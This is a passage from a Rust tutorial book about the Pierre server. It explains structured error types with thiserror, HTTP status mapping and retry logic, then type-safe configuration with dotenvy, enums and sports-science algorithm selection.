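With `anyhow::Error`, this decision would require fragile string inspection; with structured variants, the compiler checks every field name and the match is exhaustive.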
Pattern 2: Tuple Variants for Simple Errors
Source: src/database/errors.rs:57-59
#[derive(Error, Debug)]
pub enum DatabaseError {
    /// Database connection error
    #[error("Database connection error: {0}")]
    ConnectionError(String),

    // More examples:
    /// Database query error
    #[error("Query execution error: {context}")]
    QueryError { context: String },
}
Use when: Single piece of context is sufficient
Creating:
return Err(DatabaseError::ConnectionError(
    "Failed to connect to postgres://localhost:5432".to_string()
));
Pattern 3: Unit Variants for Simple Cases
#[derive(Error, Debug)]
pub enum ConfigError {
    #[error("Configuration file not found")]
    NotFound,
    #[error("Permission denied accessing configuration")]
    PermissionDenied,
}
Use when: Error needs no additional context
Pattern 4: Wrapping External Errors
Source: src/database/errors.rs:86-96
#![allow(unused)]
fn main() {
#[derive(Error, Debug)]
pub enum DatabaseError {
/// Underlying SQLx error
#[error("Database error: {0}")]
Sqlx(#[from] sqlx::Error), // ← Automatic conversion
/// Serialization/deserialization error
#[error("Serialization error: {0}")]
SerializationError(#[from] serde_json::Error),
/// UUID parsing error
#[error("Invalid UUID: {0}")]
InvalidUuid(#[from] uuid::Error),
// Note: No blanket anyhow::Error conversion - all errors are structured!
}
}
Rust Idioms Explained:
- `#[from]` attribute
  - Auto-generates `impl From<ExternalError> for MyError`
  - Enables the `?` operator to auto-convert errors
- Generated `From` implementation:
#![allow(unused)]
fn main() {
// thiserror generates this:
impl From<sqlx::Error> for DatabaseError {
fn from(err: sqlx::Error) -> Self {
Self::Sqlx(err)
}
}
}
- Usage with the `?` operator:
#![allow(unused)]
fn main() {
async fn get_user(id: &str) -> Result<User, DatabaseError> {
// sqlx::Error automatically converts to DatabaseError::Sqlx
let row = sqlx::query!("SELECT * FROM users WHERE id = ?", id)
.fetch_one(&pool)
.await?; // ← Auto-conversion happens here
Ok(user_from_row(row))
}
}
Reference: Rust Book - The ? Operator
Error Code System
Pierre maps domain errors to HTTP status codes and error codes.
Source: src/errors.rs:41-100
#![allow(unused)]
fn main() {
/// Standard error codes used throughout the application
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum ErrorCode {
// Authentication & Authorization
AuthRequired, // 401
AuthInvalid, // 401
AuthExpired, // 403
AuthMalformed, // 403
PermissionDenied, // 403
// Rate Limiting
RateLimitExceeded, // 429
QuotaExceeded, // 429
// Validation
InvalidInput, // 400
MissingRequiredField,// 400
InvalidFormat, // 400
ValueOutOfRange, // 400
// Resource Management
ResourceNotFound, // 404
ResourceAlreadyExists, // 409
ResourceLocked, // 409
ResourceUnavailable, // 503
// External Services
ExternalServiceError, // 502
ExternalServiceUnavailable, // 502
ExternalAuthFailed, // 503
ExternalRateLimited, // 503
// Internal Errors
InternalError, // 500
DatabaseError, // 500
StorageError, // 500
SerializationError, // 500
}
}
HTTP Status Code Mapping
Source: src/errors.rs:87-138
#![allow(unused)]
fn main() {
impl ErrorCode {
/// Get the HTTP status code for this error
#[must_use]
pub const fn http_status(self) -> u16 {
match self {
// 400 Bad Request
Self::InvalidInput
| Self::MissingRequiredField
| Self::InvalidFormat
| Self::ValueOutOfRange => crate::constants::http_status::BAD_REQUEST,
// 401 Unauthorized - Authentication issues
Self::AuthRequired | Self::AuthInvalid =>
crate::constants::http_status::UNAUTHORIZED,
// 403 Forbidden - Authorization issues
Self::AuthExpired | Self::AuthMalformed | Self::PermissionDenied =>
crate::constants::http_status::FORBIDDEN,
// 404 Not Found
Self::ResourceNotFound => crate::constants::http_status::NOT_FOUND,
// 409 Conflict
Self::ResourceAlreadyExists | Self::ResourceLocked =>
crate::constants::http_status::CONFLICT,
// 429 Too Many Requests
Self::RateLimitExceeded | Self::QuotaExceeded =>
crate::constants::http_status::TOO_MANY_REQUESTS,
// 500 Internal Server Error
Self::InternalError
| Self::DatabaseError
| Self::StorageError
| Self::SerializationError =>
crate::constants::http_status::INTERNAL_SERVER_ERROR,
// ... 502/503 arms for the external-service and availability variants elided
}
}
}
}
Rust Idioms Explained:
- `#[must_use]` attribute
  - Compiler warns if the return value is ignored
  - Prevents silent mistakes: a bare `error.http_status();` triggers a warning
- `pub const fn` - const function
  - Can be evaluated at compile time
  - No heap allocations allowed
  - Perfect for simple mappings like this
- Pattern matching with `|` (OR patterns)
  - `Self::InvalidInput | Self::MissingRequiredField` matches either variant
  - Cleaner than nested `if` statements
Reference: Rust Reference - Const Functions
User-Friendly Descriptions
Source: src/errors.rs:140-172
#![allow(unused)]
fn main() {
impl ErrorCode {
/// Get a user-friendly description of this error
#[must_use]
pub const fn description(self) -> &'static str {
match self {
Self::AuthRequired =>
"Authentication is required to access this resource",
Self::AuthInvalid =>
"The provided authentication credentials are invalid",
Self::RateLimitExceeded =>
"Rate limit exceeded. Please slow down your requests",
Self::ResourceNotFound =>
"The requested resource was not found",
// ... more descriptions
}
}
}
}
Return type: &'static str - String slice with 'static lifetime
- Lives for entire program duration
- No heap allocation
- Stored in binary’s read-only data section
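Because every description is a string literal baked into the binary, the entire lookup can run at compile time. A minimal std-only sketch (variant set trimmed to two for brevity):

```rust
#[derive(Clone, Copy)]
pub enum ErrorCode {
    AuthRequired,
    ResourceNotFound,
}

impl ErrorCode {
    /// The literals live in the binary's read-only data section,
    /// so this lookup allocates nothing.
    pub const fn description(self) -> &'static str {
        match self {
            Self::AuthRequired => "Authentication is required to access this resource",
            Self::ResourceNotFound => "The requested resource was not found",
        }
    }
}

// Evaluated entirely at compile time thanks to `const fn`:
const NOT_FOUND_MSG: &str = ErrorCode::ResourceNotFound.description();
```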
Error Conversion with From/Into
Rust’s ? operator relies on From trait implementations for automatic error conversion.
Automatic `From` with `#[from]`
Source: src/database/errors.rs:86-96
#![allow(unused)]
fn main() {
#[derive(Error, Debug)]
pub enum DatabaseError {
#[error("Database error: {0}")]
Sqlx(#[from] sqlx::Error), // ← Generates From impl automatically
}
}
Error Propagation Chain
#![allow(unused)]
fn main() {
// Example: Error propagates through multiple layers
// Layer 1: Database operation
async fn get_user_from_db(id: &str) -> Result<User, DatabaseError> {
let row = sqlx::query!("SELECT * FROM users WHERE id = ?", id)
.fetch_one(&pool)
.await?; // sqlx::Error → DatabaseError::Sqlx
Ok(user_from_row(row))
}
// Layer 2: Service operation
async fn fetch_user(id: &str) -> Result<User, AppError> {
let user = get_user_from_db(id)
.await?; // DatabaseError → AppError::Database
Ok(user)
}
// Layer 3: HTTP handler
async fn user_endpoint(id: String) -> impl IntoResponse {
match fetch_user(&id).await {
Ok(user) => (StatusCode::OK, Json(user)),
Err(app_error) => {
let status = app_error.http_status();
let body = app_error.to_json();
(status, Json(body))
}
}
}
}
Rust Idioms Explained:
- `?` operator propagation
  - Converts error types automatically via `From` implementations
  - Early return on the `Err` variant
  - Equivalent to the manual `match`:
#![allow(unused)]
fn main() {
// These are equivalent:
let user = get_user_from_db(id).await?;
// Desugared version:
let user = match get_user_from_db(id).await {
Ok(val) => val,
Err(e) => return Err(e.into()), // ← Calls From::from
};
}
- Error wrapping hierarchy
- Low-level errors (sqlx::Error) → Domain errors (DatabaseError)
- Domain errors → Application errors (AppError)
- Application errors → HTTP responses
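The three-layer chain can be exercised end-to-end with std-only stand-ins for the real error types (all names here are illustrative placeholders, not Pierre's actual types):

```rust
// Stand-in for a third-party error like sqlx::Error.
#[derive(Debug)]
struct SqlxError(String);

#[derive(Debug)]
enum DatabaseError {
    Sqlx(SqlxError),
}

#[derive(Debug)]
enum AppError {
    Database(DatabaseError),
}

// What `#[from]` would generate at each layer:
impl From<SqlxError> for DatabaseError {
    fn from(e: SqlxError) -> Self {
        Self::Sqlx(e)
    }
}
impl From<DatabaseError> for AppError {
    fn from(e: DatabaseError) -> Self {
        Self::Database(e)
    }
}

fn raw_query() -> Result<u32, SqlxError> {
    Err(SqlxError("connection refused".into()))
}

fn db_layer() -> Result<u32, DatabaseError> {
    Ok(raw_query()?) // SqlxError → DatabaseError via From
}

fn service_layer() -> Result<u32, AppError> {
    Ok(db_layer()?) // DatabaseError → AppError via From
}
```

Each `?` performs one hop of the wrapping hierarchy; no explicit conversion code appears at the call sites.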
Reference: Rust Book - Error Propagation
Provider Error with Retry Logic
Provider errors include retry information for transient failures.
Source: src/providers/errors.rs:10-101
#![allow(unused)]
fn main() {
#[derive(Error, Debug)]
pub enum ProviderError {
/// Provider API is unavailable or returning errors
#[error("Provider {provider} API error: {status_code} - {message}")]
ApiError {
provider: String,
status_code: u16,
message: String,
retryable: bool,
},
/// Rate limit exceeded with retry information
#[error("Rate limit exceeded for {provider}: retry after {retry_after_secs} seconds")]
RateLimitExceeded {
provider: String,
retry_after_secs: u64,
limit_type: String,
},
// ... more variants
}
impl ProviderError {
/// Check if error is retryable
#[must_use]
pub const fn is_retryable(&self) -> bool {
match self {
Self::ApiError { retryable, .. } => *retryable,
Self::RateLimitExceeded { .. } | Self::NetworkError(_) => true,
Self::AuthenticationFailed { .. }
| Self::NotFound { .. }
| Self::InvalidData { .. } => false,
}
}
/// Get retry delay in seconds if applicable
#[must_use]
pub const fn retry_after_secs(&self) -> Option<u64> {
match self {
Self::RateLimitExceeded { retry_after_secs, .. } =>
Some(*retry_after_secs),
_ => None,
}
}
}
}
Usage in retry logic:
#![allow(unused)]
fn main() {
async fn fetch_with_retry(url: &str) -> Result<Response, ProviderError> {
let mut attempts = 0;
loop {
match fetch(url).await {
Ok(response) => return Ok(response),
Err(e) if e.is_retryable() && attempts < 3 => {
attempts += 1;
if let Some(delay) = e.retry_after_secs() {
tokio::time::sleep(Duration::from_secs(delay)).await;
} else {
// Exponential backoff: 2^attempts seconds
let delay = 2_u64.pow(attempts);
tokio::time::sleep(Duration::from_secs(delay)).await;
}
}
Err(e) => return Err(e), // Non-retryable or max attempts
}
}
}
}
Rust Idioms Explained:
- Match guards: `if e.is_retryable()`
  - Add conditions to match arms
  - `Err(e) if e.is_retryable()` only matches retryable errors
- `const fn` methods
  - Methods callable in const contexts
  - No allocations, pure logic only
- Exponential backoff calculation
  - `2_u64.pow(attempts)` calculates 2^n
  - The underscore in `2_u64` is a readability separator in the literal
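The delay schedule from that loop is easy to isolate and spot-check on its own. A small sketch of the same policy (a hypothetical helper, not a function in the Pierre codebase):

```rust
/// Delay before the next retry: an explicit `retry_after` hint from the
/// provider wins; otherwise fall back to exponential backoff (2^attempt s).
fn retry_delay_secs(retry_after: Option<u64>, attempt: u32) -> u64 {
    retry_after.unwrap_or_else(|| 2_u64.pow(attempt))
}
```

Separating the policy from the sleep makes the schedule trivially unit-testable without any async runtime.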
Result Type Aliases
Pierre defines type aliases for cleaner signatures.
Source: src/database/errors.rs:143
#![allow(unused)]
fn main() {
/// Result type for database operations
pub type DatabaseResult<T> = Result<T, DatabaseError>;
}
Source: src/providers/errors.rs:200
#![allow(unused)]
fn main() {
/// Result type for provider operations
pub type ProviderResult<T> = Result<T, ProviderError>;
}
Usage:
#![allow(unused)]
fn main() {
// Without alias
async fn get_user(id: &str) -> Result<User, DatabaseError> { ... }
// With alias (cleaner)
async fn get_user(id: &str) -> DatabaseResult<User> { ... }
}
Rust Idiom: Type aliases reduce boilerplate for commonly-used Result types.
Reference: Rust Book - Type Aliases
Error Handling Patterns
Pattern 1: `map_err` for Context
#![allow(unused)]
fn main() {
use crate::database::DatabaseError;
async fn load_config(path: &str) -> DatabaseResult<Config> {
let contents = tokio::fs::read_to_string(path)
.await
.map_err(|e| DatabaseError::InvalidData {
field: "config_file".to_string(),
reason: format!("Failed to read config from {}: {}", path, e),
})?;
let config: Config = serde_json::from_str(&contents)
.map_err(DatabaseError::SerializationError)?;
Ok(config)
}
}
Rust Idiom: .map_err(|e| ...) transforms one error type to another, adding context.
Pattern 2: `ok_or_else` for Option → Result
#![allow(unused)]
fn main() {
fn find_user_by_email(email: &str) -> DatabaseResult<User> {
users_cache.get(email)
.ok_or_else(|| DatabaseError::NotFound {
entity_type: "user".to_string(),
entity_id: email.to_string(),
})
}
}
Rust Idiom: Convert Option<T> to Result<T, E> with custom error.
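A runnable std-only version of the same conversion, using a `HashMap` as a stand-in cache (type and field names are illustrative):

```rust
use std::collections::HashMap;

#[derive(Debug, PartialEq)]
enum DbError {
    NotFound { entity_type: &'static str, entity_id: String },
}

fn find_user(cache: &HashMap<String, u32>, email: &str) -> Result<u32, DbError> {
    cache
        .get(email)
        .copied()
        // `ok_or_else` builds the error lazily - only on the `None` path.
        .ok_or_else(|| DbError::NotFound {
            entity_type: "user",
            entity_id: email.to_string(),
        })
}
```

Prefer `ok_or_else` over `ok_or` when constructing the error allocates, so the happy path pays nothing.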
Pattern 3: `and_then` for Chaining
#![allow(unused)]
fn main() {
async fn get_user_and_validate(id: &str) -> DatabaseResult<User> {
get_user_from_db(id)
.await
.and_then(|user| {
if user.is_active {
Ok(user)
} else {
Err(DatabaseError::InvalidData {
field: "is_active".to_string(),
reason: "User account is inactive".to_string(),
})
}
})
}
}
Rust Idiom: .and_then() chains operations that can fail, flattening nested Results.
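A self-contained sketch of the same flattening, with stub types standing in for the real user and error types:

```rust
#[derive(Debug, PartialEq)]
struct User {
    id: u32,
    is_active: bool,
}

#[derive(Debug, PartialEq)]
enum DbError {
    Inactive,
    NotFound,
}

// Stub lookup: id 1 is active, id 2 is inactive, anything else is missing.
fn get_user(id: u32) -> Result<User, DbError> {
    match id {
        1 => Ok(User { id, is_active: true }),
        2 => Ok(User { id, is_active: false }),
        _ => Err(DbError::NotFound),
    }
}

/// `and_then` flattens what would otherwise nest as Result<Result<User, _>, _>.
fn get_active_user(id: u32) -> Result<User, DbError> {
    get_user(id).and_then(|u| if u.is_active { Ok(u) } else { Err(DbError::Inactive) })
}
```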
Reference: Rust Book - Result Methods
Diagram: Error Flow
┌─────────────────────────────────────────────────────────────┐
│ HTTP Request │
└──────────────────────┬──────────────────────────────────────┘
│
▼
┌─────────────────────────────┐
│ HTTP Handler (Axum) │
│ Returns: Result<T, AppError>│
└─────────────┬───────────────┘
│ ?
▼
┌─────────────────────────────┐
│ Service Layer │
│ Returns: Result<T, AppError>│
└─────────────┬───────────────┘
│ ?
┌─────────────┼────────────────┐
│ │ │
▼ ▼ ▼
┌────────────────┐ ┌──────────────┐ ┌──────────────┐
│ Database Layer │ │Provider Layer│ │ Other Layers │
│DatabaseError │ │ProviderError │ │ProtocolError │
└────────┬───────┘ └──────┬───────┘ └──────┬───────┘
│ │ │
│ From impl │ From impl │ From impl
└────────────────┼────────────────┘
│
▼
┌─────────────────────────────┐
│ AppError │
│ (unified application error)│
└─────────────┬───────────────┘
│
▼
┌─────────────────────────────┐
│ HTTP Response │
│ Status Code + JSON Body │
└─────────────────────────────┘
Flow explanation:
- Request enters the HTTP handler
- Handler calls the service layer (propagates with `?`)
- Service calls database/provider/protocol layers (propagates with `?`)
- Domain errors automatically convert to `AppError` via `From` implementations
- `AppError` converts to the HTTP response (status code + JSON body)
Rust Idioms Summary
| Idiom | Purpose | Example Location |
|---|---|---|
| `thiserror::Error` derive | Auto-implement Error trait | src/database/errors.rs:10 |
| `#[error("...")]` attribute | Define Display format | src/database/errors.rs:13 |
| `#[from]` attribute | Auto-generate From impl | src/database/errors.rs:88 |
| Enum variants with fields | Structured error context | src/errors.rs:19-85 |
| `#[must_use]` attribute | Warn on unused return | src/errors.rs:89 |
| `pub const fn` | Compile-time functions | src/errors.rs:90 |
| Type aliases | Cleaner Result signatures | src/database/errors.rs:110 |
| `.map_err()` | Error transformation | Throughout codebase |
| `?` operator | Error propagation | Throughout codebase |
Key Takeaways
- Never use `anyhow::anyhow!()` in production - use structured error types
- thiserror is the standard - a derive macro for custom errors
- Error hierarchies match domains - DatabaseError, ProviderError, AppError
- `#[from]` enables the `?` operator - automatic error conversion
- Add context to errors - struct variants with meaningful fields
- HTTP mapping at boundaries - ErrorCode → status codes
- Retry logic in error types - ProviderError includes retry information
Next Chapter
Chapter 3: Configuration Management & Environment Variables - Learn how Pierre uses type-safe configuration with dotenvy, clap, and the algorithm selection system.
Chapter 3: Configuration Management & Environment Variables
Introduction
Production applications require flexible configuration that works across development, staging, and production environments. Pierre uses a multi-layered configuration system:
- Environment variables - Runtime configuration (highest priority)
- Type-safe enums - Compile-time validation of config values
- Default values - Sensible fallbacks for missing configuration
- Algorithm selection - Runtime choice of sports science algorithms
This chapter teaches you how to build configuration systems that are both flexible and type-safe.
Config Module Structure
Pierre’s configuration system is organized into specialized submodules for maintainability:
src/config/
├── mod.rs # Module orchestrator with re-exports
├── types.rs # Core types: LogLevel, Environment, LlmProviderType
├── database.rs # DatabaseUrl, PostgresPoolConfig, BackupConfig
├── oauth.rs # OAuth provider configs, FirebaseConfig
├── api_providers.rs # Strava, Fitbit, Garmin API configs
├── network.rs # HTTP client, SSE, CORS, TLS settings
├── cache.rs # Redis, rate limiting, TTL configs
├── security.rs # Authentication, headers, monitoring
├── logging.rs # PII redaction, log sampling
├── mcp.rs # MCP protocol configuration
├── fitness.rs # Sport types, training zones
├── environment.rs # ServerConfig orchestrator
├── intelligence/ # AI/ML configuration
│ ├── algorithms.rs # Algorithm selection (TSS, MaxHR, FTP, etc.)
│ ├── activity.rs # Activity analysis settings
│ ├── goals.rs # Goal management configuration
│ ├── metrics.rs # Metric thresholds and settings
│ ├── nutrition.rs # Nutrition analysis config
│ ├── performance.rs # Performance prediction settings
│ ├── recommendation.rs # Recommendation engine config
│ ├── sleep_recovery.rs # Sleep/recovery analysis settings
│ └── weather.rs # Weather integration config
├── catalog.rs # Parameter catalog and schemas
├── profiles.rs # User profile configs
├── runtime.rs # Session-scoped overrides
├── validation.rs # Config validation rules
├── vo2_max.rs # VO2max-based calculations
├── admin/ # Admin configuration management
│ ├── manager.rs # Runtime config manager
│ ├── service.rs # Config service layer
│ └── types.rs # Admin config types
└── routes/ # HTTP endpoints for config
├── admin.rs # Admin config endpoints
├── configuration.rs # Config API endpoints
└── fitness.rs # Fitness config endpoints
Key design principles:
- Single responsibility: each module handles one configuration domain
- Re-exports: `mod.rs` re-exports commonly used types for convenience
- Hierarchical organization: related configs grouped in submodules
- Separation of concerns: routes, types, and logic in separate files
Environment Variables with Dotenvy
Pierre uses dotenvy to load environment variables from .envrc files in development.
.envrc File Pattern
Source: .envrc.example (root directory)
# Database configuration
export DATABASE_URL="sqlite:./data/users.db"
export PIERRE_MASTER_ENCRYPTION_KEY="$(openssl rand -base64 32)"
# Server configuration
export HTTP_PORT=8081
export RUST_LOG=info
export JWT_EXPIRY_HOURS=24
# OAuth provider credentials
export STRAVA_CLIENT_ID=your_client_id
export STRAVA_CLIENT_SECRET=your_client_secret
export STRAVA_REDIRECT_URI=http://localhost:8081/api/oauth/callback/strava
# Algorithm configuration
export PIERRE_MAXHR_ALGORITHM=tanaka
export PIERRE_TSS_ALGORITHM=avg_power
export PIERRE_VDOT_ALGORITHM=daniels
Loading at startup:
Source: src/bin/pierre-mcp-server.rs (implicit via dotenvy)
use crate::errors::AppResult;
#[tokio::main]
async fn main() -> AppResult<()> {
// Load .env if present (development only; `.envrc` itself is loaded by direnv
// before the process starts)
dotenvy::dotenv().ok(); // ← Silently ignores a missing file
// Parse configuration from environment
let config = ServerConfig::from_env()?;
// Rest of initialization...
Ok(())
}
Rust Idioms Explained:
- `.ok()` to ignore errors
  - Converts `Result<T, E>` to `Option<T>`
  - Discards the error (a missing file is fine in production)
  - Production deployments use real env vars, not files
- `dotenvy::dotenv()` behavior
  - Searches for a `.env` file in the current and parent directories
  - Loads variables into the process environment
  - Does NOT override existing env vars (existing values take precedence)
Reference: dotenvy crate documentation
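That precedence rule ("existing variables win") can be modeled over a plain map standing in for the process environment. This is a sketch of dotenvy's observable behavior, not its implementation:

```rust
use std::collections::HashMap;

/// Apply key/value pairs from a dotfile to an environment map:
/// a file value is used only when the key is not already set,
/// mirroring how dotenvy never overrides existing env vars.
fn apply_dotfile(env: &mut HashMap<String, String>, file: &[(&str, &str)]) {
    for (k, v) in file {
        env.entry((*k).to_string())
            .or_insert_with(|| (*v).to_string());
    }
}
```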
Type-Safe Configuration Enums
Pierre uses enums to represent configuration values, gaining compile-time type safety.
LogLevel Enum
Source: src/config/types.rs:11-64
Module Organization Note: The config module was split into specialized submodules. Core types like `LogLevel`, `Environment`, and `LlmProviderType` now live in `src/config/types.rs`.
#![allow(unused)]
fn main() {
/// Strongly typed log level configuration
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq, Default)]
#[serde(rename_all = "lowercase")]
pub enum LogLevel {
/// Error level - only critical errors
Error,
/// Warning level - potential issues
Warn,
/// Info level - normal operational messages (default)
#[default]
Info,
/// Debug level - detailed debugging information
Debug,
/// Trace level - very verbose tracing
Trace,
}
impl LogLevel {
/// Convert to `tracing::Level`
#[must_use]
pub const fn to_tracing_level(&self) -> tracing::Level {
match self {
Self::Error => tracing::Level::ERROR,
Self::Warn => tracing::Level::WARN,
Self::Info => tracing::Level::INFO,
Self::Debug => tracing::Level::DEBUG,
Self::Trace => tracing::Level::TRACE,
}
}
/// Parse from string with fallback
#[must_use]
pub fn from_str_or_default(s: &str) -> Self {
match s.to_lowercase().as_str() {
"error" => Self::Error,
"warn" => Self::Warn,
"debug" => Self::Debug,
"trace" => Self::Trace,
_ => Self::Info, // Default fallback
}
}
}
impl std::fmt::Display for LogLevel {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
match self {
Self::Error => write!(f, "error"),
Self::Warn => write!(f, "warn"),
Self::Info => write!(f, "info"),
Self::Debug => write!(f, "debug"),
Self::Trace => write!(f, "trace"),
}
}
}
}
Rust Idioms Explained:
- `#[derive(Default)]` with a `#[default]` variant
  - Stabilized in Rust 1.62
  - Marks which variant is the default
  - `LogLevel::default()` returns `LogLevel::Info`
- `#[serde(rename_all = "lowercase")]`
  - Serializes `LogLevel::Error` as `"error"` (not `"Error"`)
  - Matches common configuration conventions
- `from_str_or_default` pattern
  - Infallible parsing (never panics)
  - Returns a sensible default for invalid input
  - Used throughout Pierre for config parsing
- `Display` trait implementation
  - Allows `format!("{}", log_level)`
  - Converts the enum back to a string for logging
Usage example:
#![allow(unused)]
fn main() {
// Parse from environment variable
let log_level = env::var("RUST_LOG")
.map(|s| LogLevel::from_str_or_default(&s))
.unwrap_or_default(); // Falls back to LogLevel::Info
// Convert to tracing level
let tracing_level = log_level.to_tracing_level();
// Use in logger initialization
tracing_subscriber::fmt()
.with_max_level(tracing_level)
.init();
}
Reference: Rust Book - Default Trait
Environment Enum (Development vs. Production)
Source: src/config/types.rs:66-112
#![allow(unused)]
fn main() {
/// Environment type for security and other configurations
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq, Default)]
#[serde(rename_all = "lowercase")]
pub enum Environment {
/// Development environment (default)
#[default]
Development,
/// Production environment with stricter security
Production,
/// Testing environment for automated tests
Testing,
}
impl Environment {
/// Parse from string with fallback
#[must_use]
pub fn from_str_or_default(s: &str) -> Self {
match s.to_lowercase().as_str() {
"production" | "prod" => Self::Production,
"testing" | "test" => Self::Testing,
_ => Self::Development, // Default fallback
}
}
/// Check if this is a production environment
#[must_use]
pub const fn is_production(&self) -> bool {
matches!(self, Self::Production)
}
/// Check if this is a development environment
#[must_use]
pub const fn is_development(&self) -> bool {
matches!(self, Self::Development)
}
}
}
Rust Idioms Explained:
- `matches!` macro - pattern matching that returns bool
  - `matches!(value, pattern)` → `true` if it matches, `false` otherwise
  - Const-fn compatible (usable in const contexts)
  - Cleaner than a manual `match` with `true`/`false` arms
- Multiple patterns with `|`
  - `"production" | "prod"` accepts either string
  - Allows flexibility in configuration values
- Helper methods for boolean checks
  - `is_production()`, `is_development()` provide a readable API
  - Enable conditional logic: `if env.is_production() { ... }`
Usage example:
#![allow(unused)]
fn main() {
let env = Environment::from_str_or_default(
&env::var("PIERRE_ENV").unwrap_or_default()
);
// Conditional security settings
if env.is_production() {
// Enforce HTTPS
// Enable strict CORS
// Disable debug endpoints
} else {
// Allow HTTP for localhost
// Permissive CORS for development
}
}
Reference: Rust Reference - matches! macro
Database Configuration with Type-Safe Enums
Pierre uses an enum to represent different database types, avoiding string-based type checking.
Source: src/config/database.rs:14-80
#![allow(unused)]
fn main() {
/// Type-safe database configuration
#[derive(Debug, Clone, Serialize, Deserialize)]
pub enum DatabaseUrl {
/// SQLite database with file path
SQLite {
path: PathBuf,
},
/// PostgreSQL connection
PostgreSQL {
connection_string: String,
},
/// In-memory SQLite (for testing)
Memory,
}
impl DatabaseUrl {
/// Parse from string with validation
pub fn parse_url(s: &str) -> Result<Self> {
if s.starts_with("sqlite:") {
let path_str = s.strip_prefix("sqlite:").unwrap_or(s);
if path_str == ":memory:" {
Ok(Self::Memory)
} else {
Ok(Self::SQLite {
path: PathBuf::from(path_str),
})
}
} else if s.starts_with("postgresql://") || s.starts_with("postgres://") {
Ok(Self::PostgreSQL {
connection_string: s.to_owned(),
})
} else {
// Fallback: treat as SQLite file path
Ok(Self::SQLite {
path: PathBuf::from(s),
})
}
}
/// Convert to connection string
#[must_use]
pub fn to_connection_string(&self) -> String {
match self {
Self::SQLite { path } => format!("sqlite:{}", path.display()),
Self::PostgreSQL { connection_string } => connection_string.clone(),
Self::Memory => "sqlite::memory:".into(),
}
}
/// Check if this is a SQLite database
#[must_use]
pub const fn is_sqlite(&self) -> bool {
matches!(self, Self::SQLite { .. } | Self::Memory)
}
/// Check if this is a PostgreSQL database
#[must_use]
pub const fn is_postgresql(&self) -> bool {
matches!(self, Self::PostgreSQL { .. })
}
}
}
Rust Idioms Explained:
- Enum variants with different data
  - `SQLite { path: PathBuf }` - struct variant with a field
  - `PostgreSQL { connection_string: String }` - a different struct variant
  - `Memory` - unit variant (no data)
- `.strip_prefix()` method
  - Removes a prefix from a string if present
  - Returns `Option<&str>` (`None` if the prefix is not found)
  - Safer than manual slicing
- `.into()` generic conversion
  - `"sqlite::memory:".into()` converts `&str` → `String`
  - Type inference determines the target type
  - Cleaner than an explicit `.to_string()` or `.to_owned()` here
- Pattern matching with `..` (field wildcards)
  - `Self::SQLite { .. }` matches any SQLite variant
  - Ignores field values (the path doesn't matter here)
Usage example:
#![allow(unused)]
fn main() {
// Parse from environment
let db_url = DatabaseUrl::parse_url(&env::var("DATABASE_URL")?)?;
// Type-specific logic
match db_url {
DatabaseUrl::SQLite { ref path } => {
println!("Using SQLite: {}", path.display());
// SQLite-specific initialization
}
DatabaseUrl::PostgreSQL { ref connection_string } => {
println!("Using PostgreSQL: {}", connection_string);
// PostgreSQL-specific initialization
}
DatabaseUrl::Memory => {
println!("Using in-memory database");
// Test-only configuration
}
}
}
Reference: Rust Book - Enum Variants
Algorithm Selection System
Pierre allows runtime selection of sports science algorithms via environment variables.
Source: src/config/intelligence/algorithms.rs:34-95
#![allow(unused)]
fn main() {
/// Algorithm Selection Configuration
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct AlgorithmConfig {
/// TSS calculation algorithm: `avg_power`, `normalized_power`, or `hybrid`
#[serde(default = "default_tss_algorithm")]
pub tss: String,
/// Max HR estimation algorithm: `fox`, `tanaka`, `nes`, or `gulati`
#[serde(default = "default_maxhr_algorithm")]
pub maxhr: String,
/// FTP estimation algorithm: `20min_test`, `from_vo2max`, `ramp_test`, etc.
#[serde(default = "default_ftp_algorithm")]
pub ftp: String,
/// LTHR estimation algorithm: `from_maxhr`, `from_30min`, etc.
#[serde(default = "default_lthr_algorithm")]
pub lthr: String,
/// VO2max estimation algorithm: `from_vdot`, `cooper_test`, etc.
#[serde(default = "default_vo2max_algorithm")]
pub vo2max: String,
}
/// Default TSS algorithm (`avg_power` for backwards compatibility)
fn default_tss_algorithm() -> String {
"avg_power".to_owned()
}
/// Default Max HR algorithm (tanaka as most accurate)
fn default_maxhr_algorithm() -> String {
"tanaka".to_owned()
}
// ... more defaults
impl Default for AlgorithmConfig {
fn default() -> Self {
Self {
tss: default_tss_algorithm(),
maxhr: default_maxhr_algorithm(),
ftp: default_ftp_algorithm(),
lthr: default_lthr_algorithm(),
vo2max: default_vo2max_algorithm(),
}
}
}
}
Rust Idioms Explained:
- `#[serde(default = "function_name")]` attribute
  - Calls the function if the field is missing during deserialization
  - The function must have signature `fn() -> T`
  - Each field can have a different default function
- Default functions pattern
  - Separate function per default value
  - Allows documenting why each default was chosen
  - Better than inline values in struct initialization
- Manual `Default` implementation
  - Calls each default function explicitly
  - Could use `#[derive(Default)]`, but manual gives more control
  - Ensures consistency between serde defaults and the `Default` trait
Configuration via environment:
# .envrc
export PIERRE_TSS_ALGORITHM=normalized_power
export PIERRE_MAXHR_ALGORITHM=tanaka
export PIERRE_VDOT_ALGORITHM=daniels
Loading algorithm config:
#![allow(unused)]
fn main() {
fn load_algorithm_config() -> AlgorithmConfig {
AlgorithmConfig {
tss: env::var("PIERRE_TSS_ALGORITHM")
.unwrap_or_else(|_| default_tss_algorithm()),
maxhr: env::var("PIERRE_MAXHR_ALGORITHM")
.unwrap_or_else(|_| default_maxhr_algorithm()),
// ... other algorithms
}
}
}
Algorithm dispatch example:
Source: src/intelligence/algorithms/maxhr.rs (conceptual)
#![allow(unused)]
fn main() {
pub fn calculate_max_hr(age: u32, gender: Gender, algorithm: &str) -> u16 {
match algorithm {
"fox" => {
// Fox formula: 220 - age
220 - age as u16
}
"tanaka" => {
// Tanaka formula: 208 - (0.7 × age)
(208.0 - (0.7 * age as f64)) as u16
}
"nes" => {
// Nes formula: 211 - (0.64 × age)
(211.0 - (0.64 * age as f64)) as u16
}
"gulati" if matches!(gender, Gender::Female) => {
// Gulati formula (women): 206 - (0.88 × age)
(206.0 - (0.88 * age as f64)) as u16
}
_ => {
// Default to Tanaka (most accurate for general population)
(208.0 - (0.7 * age as f64)) as u16
}
}
}
}
